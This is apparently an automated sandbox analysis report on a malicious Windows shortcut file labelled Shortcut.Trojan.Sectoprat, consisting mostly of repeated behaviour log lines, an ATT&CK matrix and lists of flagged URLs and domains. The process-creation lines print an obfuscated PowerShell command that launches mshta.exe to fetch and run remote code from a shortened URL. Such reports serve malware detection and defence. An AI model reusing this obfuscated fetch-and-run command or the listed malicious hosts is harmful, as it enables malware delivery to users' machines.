Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2047Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1248Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1506Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 583Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7220Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392Thread sleep count: 2047 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396Thread sleep count: 1248 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7424Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep count: 1506 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep count: 583 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7816Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: mshta.exe, 00000008.00000002.2535430577.000001473411D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2535430577.00000147340C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.000001473408C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.00000147340C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2535430577.0000014734076000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.000001473411D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2535802428.0000025764E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2537545828.000002576A453000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: ssh.exe, 00000003.00000002.2534188898.0000016661CC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\mshta.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command ('msh]]]]]]]ta.]]]]]]]e]]]]]x]]]]]]e h]]]]]]t]]]]]t]]]]]]]ps://]]]]]]g]]]]]]]o]]]]]o]]]]]].]]]]]]s]]]]]]u/]]]]]]J]]]]]3J]]]]]]Hq]]]]]]]I]]]]]]i' -replace ']')Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://goo.su/J3JHqIi"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://goo.su/J3JHqIiJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading		11
Process Injection		11
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Disable or Modify Tools		LSASS Memory11
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
Virtualization/Sandbox Evasion		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials23
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
bxAoaISZJQ.lnk6%VirustotalBrowse
bxAoaISZJQ.lnk34%ReversingLabsShortcut.Trojan.Sectoprat

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
enduresopens.com8%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://enduresopens.com/100%Avira URL Cloudmalware
https://enduresopens.com/ttkXIvunodY/69489p100%Avira URL Cloudmalware
https://enduresopens.com/ttkXIvunodY/69489-cl-ob.js?pubid=883146&siteid=330256&niche=33/6100%Avira URL Cloudmalware
https://enduresopens.com/ttkXIvunodY/69489oto:400&display=swapap100%Avira URL Cloudmalware
https://enduresopens.com/ttkXIvunodY/69489-cl-ob.js?pubid=883146&siteid=330256&niche=33DA100%Avira URL Cloudmalware
https://cndef1.green-pathways.shop/api/uz/7552973650/index.mp40%Avira URL Cloudsafe
https://enduresopens.com/ttkXIvunodY/69489100%Avira URL Cloudmalware
https://fonts.googleapis0%Avira URL Cloudsafe
https://enduresopens.com/ttkXIvunodY/69489eflate100%Avira URL Cloudmalware
https://enduresopens.com/ttkXIvunodY/69489n.100%Avira URL Cloudmalware
https://enduresopens.com/ttkXIvunodY/69489Sl8100%Avira URL Cloudmalware
https://enduresopens.com/ttkXIvunodY/69489C:100%Avira URL Cloudmalware
https://enduresopens.com/ttkXIvunodY/69489Internet100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
counter.yadro.ru
88.212.201.204
truefalse
    		high
    enduresopens.com
    		23.109.170.83
    		truefalseunknown
    top-fwz1.mail.ru
    		95.163.52.67
    		truefalse
      		high
      an.yandex.ru
      		213.180.204.90
      		truefalse
        		high
        goo.su
        		172.67.139.105
        		truefalse
          		high
          richinfo.co
          		109.200.199.111
          		truefalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://top-fwz1.mail.ru/js/code.jsfalse
              		high
              https://counter.yadro.ru/hit?t44.11;r;s1280*1024*32;uhttps%3A//goo.su/J3JHqIi;hRedirecting;0.009693880063321946false
                		high
